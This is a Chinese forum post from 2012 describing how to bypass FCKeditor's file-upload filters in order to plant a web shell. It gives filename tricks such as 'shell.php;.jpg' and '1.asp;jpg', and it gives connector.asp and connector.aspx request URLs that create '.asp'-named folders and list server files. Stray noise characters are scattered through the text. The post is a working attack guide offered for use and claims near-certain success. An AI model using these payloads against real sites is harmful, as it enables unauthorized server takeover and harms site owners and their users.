很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
9 w+ ~+ W" o* M4 f# y4 t+ F9 `% C: F3 W) n7 y$ D S/ [
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。7 h( ^* G: ~6 T+ a3 J
, e5 e0 U: p* e
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。; e1 j; `' ]6 f. C2 t
: R2 E0 A# v( {
突破建立文件夹:
1 v/ r1 _* I: L4 [9 x; t' A0 r7 B+ P8 r# F. {2 u6 t
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
5 @% v5 f5 o1 ?& f$ F
" O1 X6 f5 t: |参数:+ e) W+ ~. g ?( x; d
$ B- a' o6 q7 I4 m$ d
当前目录名:CurrentFolder=/qing.asp6 u4 @. y- B. G$ d" n! o4 ]
2 c9 M5 ?$ y: w* H4 p3 T
新的目录名:NewFolderName=x.asp% ~2 Y0 t. j# o1 T5 \
~6 S' N6 C; W2 w" }( v! P其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
' N& p" h }" d# K( ^
3 q0 E7 L+ K5 N1 R: T那么 x.asp 就已经建立生成了,此方法百试百灵!1 J' C: Q3 i3 V0 B' b* r
% Y: k/ b S' S. s5 h# n
新建文件夹参数 x.asp,基本都能搞定。
3 C5 ?. ]) v! v. y, @% w7 p9 N! w) r4 v
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建3 ]9 j1 r- g7 I/ V5 u0 n5 ]$ u: j) }
( {( G. R5 ]) \0 vaspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp& [0 ?, p1 P8 r r2 J
9 y# M+ z( k/ @) P. W
获取文件列表
8 n* z0 E; {7 l$ Z aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
# g/ @* c7 [) v* J" r& i. |5 p* o9 B m' y% a9 E# D
|
发表于 2012-12-31 09:27:09
收藏
支持
反对